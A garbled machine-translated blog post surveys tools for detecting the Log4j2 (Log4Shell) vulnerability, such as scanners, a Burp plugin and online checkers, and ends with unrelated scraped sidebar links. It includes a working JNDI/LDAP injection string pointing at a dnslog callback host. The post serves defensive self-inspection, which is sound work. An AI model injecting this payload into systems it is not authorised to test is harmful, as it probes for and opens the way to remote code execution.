当前位置:网站首页>Log4j2 vulnerability detection tool list
Log4j2 vulnerability detection tool list
2022-06-25 20:19:00 【Bypass--】
distance Log4j2 It's been a month since the vulnerability was exposed , The serious impact it has caused does not need to be mentioned again . as time goes on , New vulnerabilities will continue to emerge , Old loopholes will continue to disappear , And this Log4j2 Medium RCE Vulnerabilities can take years to resolve . therefore , In the next period of time , This loophole is still the focus we need to pay attention to .
This paper collects and sorts out several vulnerability detection methods and tools , For use Log4j2 Vulnerability detection and self inspection .
1、dnslog Manual verification method
First, in the dnslog The platform obtains a subdomain name , Try to construct payload, Insert request packet .
${jndi:ldap://bypass.fzuqgl.ceye.io}
adopt dnslog Whether the platform receives the request , Preliminarily judge whether there are loopholes in the target environment .

2、Log4j-scan
One for finding log4j2 Loopholes python Script , Support url testing , Support HTTP Request the head and POST Fuzzy test of data parameters .
github Project address :
https://github.com/fullhunt/log4j-scan
3、Log4j2 burp Passive scanning plug-in
Through plug-ins , take lLog4j2 Vulnerability detection capabilities are integrated into burp, So as to improve the vulnerability detection ability of security testers .
github Project address :
https://github.com/f0ng/log4j2burpscannerLog4j2 burp Passive scanning plug-in effect :

4、AWVS scanning log4j2 Loophole
AWVS14 Latest version support Log4j2 Vulnerability detection , Support batch scanning , Vulnerability scanning artifact won't let you down , Get ready to update the Arsenal .

5、 Product grade Log4j2 Vulnerability detection tools
This testing tool is based on Tencent security binAuditor, Support Jar/Ear/War Package upload , One click upload to get the test results .
Detection address :
https://bsca.ms.qq.com/Jar Packet test results :

6、Log4j2 Local detection tools
Extracted from Changting Muyun products Log4j2 Local detection tools , It can quickly discover the risk of the current server log4j2 application .
Log4j2 Vulnerability detection tool address :
https://log4j2-detector.chaitin.cn/
7、360 Log4j2 Test kit
Browser passive scanning + Local detection tools , Provides a complete Log4j2 Vulnerability detection scheme , in addition , The toolkit also includes Log4j2 Patch scheme , Here's the picture :

边栏推荐
- Force wechat page font size to be 100%
- Modifying routes without refreshing the interface
- Png to NII
- Database data type design (the most detailed in the whole network)
- PAT B1061
- 打新债证券开户安全吗
- App battery historian master
- Case: count the most characters and times
- TypeError: __ init__ () takes 1 positional argument but 5 were given
- Number of wechat applet custom input boxes
猜你喜欢

How to understand var = a = b = C = 9? How to pre parse?

Interface automation -md5 password encryption

Leetcode daily question - 28 Implement strstr() (simple)

Transunet reading notes

Remember to deploy selenium crawler on the server

Profile path and name

One picture to achieve the selected effect

206. reverse linked list (insert, iteration and recursion)

<C>. Figure guessing game

Hdoj topic 2005 day
随机推荐
K-fold cross validation
2.17(Avoid The Lakes)
Web container basic configuration
PAT B1066
Is it safe to open a new bond? Is low commission reliable
JS get the parameters in the URL link
Png to NII
Usage Summary of str.format() function [not 'str****{}'.Format()]
Suddenly found that the screen adjustment button can not be used and the brightness can not be adjusted
Avoid material "minefields"! Play super high conversion rate
II Traits (extractors)
Use of serialize() and serializearray() methods for form data serialization
C language PTA -- continuity factor
手机开户股票安全吗,买股票在哪开户?
How to understand var = a = b = C = 9? How to pre parse?
E-commerce project environment construction
Pta--7-20 exchange minimum and maximum (15 points)
Install and initialize MySQL (under Windows)
<C>. Figure guessing game
Transunet reading notes